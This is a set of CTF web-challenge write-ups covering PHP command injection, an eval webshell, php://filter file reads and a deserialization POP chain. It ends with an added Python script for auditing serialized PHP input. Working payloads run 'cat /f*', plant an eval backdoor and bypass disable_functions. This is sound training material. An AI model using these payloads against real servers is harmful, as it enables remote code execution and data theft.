[SWPUCTF 2023 Autumn Freshman Contest] Pingpingping

Noting a small trick.

RCE: in PHP, a [ in a parameter name is parsed as _. That character (_) cannot be used in the GET parameter here, so [ is used in its place.

payload:

?Ping[ip.exe=127.0.0.1;cat /f*

[GKCTF 2020]CheckIN

Source:

<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
    public $code = null;
    public $decode = null;
    function __construct()
    {
        $this->code = @$this->x()['Ginkgo'];
        $this->decode = @base64_decode( $this->code );
        @Eval($this->decode);
    }

    public function x()
    {
        return $_REQUEST;
    }
}
new ClassName();

The parameter sent in the request must be base64-encoded, and the key is Ginkgo.

Run phpinfo first; payload:

?Ginkgo=cGhwaW5mbygpOw==

pcntl, system and exec are all disabled, but eval is not.

eval($_POST['a']);

ZXZhbCgkX1BPU1RbJ2EnXSk7

After sending the parameter, connect with AntSword. The root directory contains flag and readflag: flag cannot be read for lack of permissions, and readflag cannot be run because the functions are disabled, so disable_functions has to be bypassed. The shell's PHP version is 7.3, and the concat bypass is used.

[NISACTF 2022]easyssrf

The hint says SSRF, so test with the file protocol.

It hints at another path; try file:///flag.

Trying fl4g reveals that ha1x1ux1u.php exists; visit it.

The file keyword is filtered, so use the php://filter pseudo-protocol.

?file=php://filter/read=convert.base64-encode/resource=/flag

Base64-decode the result to get the flag.

[NISACTF 2022]babyserialize

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//    if(preg_match(......)){
//        die(something wrong);
//    }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

The NISA class has @eval inside __invoke, so look for somewhere a NISA object gets called as a function: $bb() in the __toString of the Ilovetxw class. __toString is triggered by strtolower in the four class, which in turn requires triggering __set; __set fires when an inaccessible property is written. Ilovetxw's __call writes fun on $this->huang, and since fun is not an accessible property there (four's fun is private), that write triggers __set. __call fires when a nonexistent method is called, which happens in TianXiWei with $this->ext->nisa($this->x); and __wakeup fires during unserialization.

Note that the value of fun in the NISA class must be changed, otherwise hint() is triggered; the WAF blocks system, which is bypassed by capitalizing it (System).

<?php
class NISA{
    public $fun="1";
    public $txw4ever="System('cat /f*');";//1
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;// Ilovetxw
    public $x;
}

class Ilovetxw{
    public $huang;//four
    public $su;
}

class four{
    public $a;
    private $fun='sixsixsix';
}
$a= new TianXiWei();
$a->ext=new Ilovetxw();
$a->ext->huang=new four();
$a->ext->huang->a=new Ilovetxw();
$a->ext->huang->a->su=new NISA();
echo urlencode(serialize($a));
?>

payload:

?ser=O%3A9%3A"TianXiWei"%3A2%3A{s%3A3%3A"ext"%3BO%3A8%3A"Ilovetxw"%3A2%3A{s%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A{s%3A1%3A"a"%3BO%3A8%3A"Ilovetxw"%3A2%3A{s%3A5%3A"huang"%3BN%3Bs%3A2%3A"su"%3BO%3A4%3A"NISA"%3A2%3A{s%3A3%3A"fun"%3Bs%3A1%3A"1"%3Bs%3A8%3A"txw4ever"%3Bs%3A18%3A"System('cat+%2Ff*')%3B"%3B}}s%3A9%3A"%00four%00fun"%3Bs%3A9%3A"sixsixsix"%3B}s%3A2%3A"su"%3BN%3B}s%3A1%3A"x"%3BN%3B}
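As an added defensive illustration (not part of the writeup), here is a small Python parser for the PHP serialize() format, covering the types the payload above uses (O, s, N). It lists every class a payload would make unserialize() instantiate, in the order the POP chain above nests them, and undoes the \0Class\0prop mangling of private properties so that untrusted input can be reviewed before it reaches unserialize(). The function names parse, visibility and audit are my own.

```python
from collections import namedtuple
from urllib.parse import unquote_plus

# The ?ser= payload from the writeup, URL-decoded; latin-1 keeps len(str) equal to the byte length that PHP's s:<len> counts.
PAYLOAD = unquote_plus('O%3A9%3A"TianXiWei"%3A2%3A{s%3A3%3A"ext"%3BO%3A8%3A"Ilovetxw"%3A2%3A{s%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A{s%3A1%3A"a"%3BO%3A8%3A"Ilovetxw"%3A2%3A{s%3A5%3A"huang"%3BN%3Bs%3A2%3A"su"%3BO%3A4%3A"NISA"%3A2%3A{s%3A3%3A"fun"%3Bs%3A1%3A"1"%3Bs%3A8%3A"txw4ever"%3Bs%3A18%3A"System(\'cat+%2Ff*\')%3B"%3B}}s%3A9%3A"%00four%00fun"%3Bs%3A9%3A"sixsixsix"%3B}s%3A2%3A"su"%3BN%3B}s%3A1%3A"x"%3BN%3B}', encoding="latin-1")
PhpObject = namedtuple("PhpObject", "name props")

def parse(d, pos=0):
    """Parse one serialized value at d[pos]; return (value, offset just after it).
    Covers the types this payload uses: O (object), s (string) and N (null)."""
    t = d[pos]
    if t == "N":                                    # N;
        return None, pos + 2
    colon = d.index(":", pos + 2)                   # s:<len>:"...";   O:<len>:"Cls":<n>:{...}
    n = int(d[pos + 2:colon])
    if t == "s":                                    # +4 steps over ':"', the closing '"' and ';'
        return d[colon + 2:colon + 2 + n], colon + n + 4
    if t == "O":
        name, pos = d[colon + 2:colon + 2 + n], colon + n + 4   # past '":'
        colon = d.index(":", pos)
        count, pos, props = int(d[pos:colon]), colon + 2, {}    # past ':{'
        for _ in range(count):
            k, pos = parse(d, pos)
            props[k], pos = parse(d, pos)
        return PhpObject(name, props), pos + 1      # skip '}'
    raise ValueError(f"unsupported type {t!r} at offset {pos}")

def visibility(key):
    """Undo name mangling: \\0*\\0p is protected, \\0Cls\\0p is private to Cls, else public."""
    if not key.startswith("\0"):
        return "public", key
    cls, _, prop = key[1:].partition("\0")
    return ("protected" if cls == "*" else f"private:{cls}"), prop

def audit(serialized):
    """Classes unserialize() would instantiate, depth-first, plus every scalar
    property as (class, visibility, prop, value) for review before use."""
    classes, props = [], []
    def walk(obj):
        classes.append(obj.name)
        for k, val in obj.props.items():
            if isinstance(val, PhpObject):
                walk(val)
            else:
                props.append((obj.name, *visibility(k), val))
    root, _ = parse(serialized)
    if isinstance(root, PhpObject):
        walk(root)
    return classes, props
```

Running audit(PAYLOAD) reports the five nested objects TianXiWei, Ilovetxw, four, Ilovetxw, NISA, the private four::fun set to sixsixsix, and the txw4ever string carrying the code that __invoke would eval.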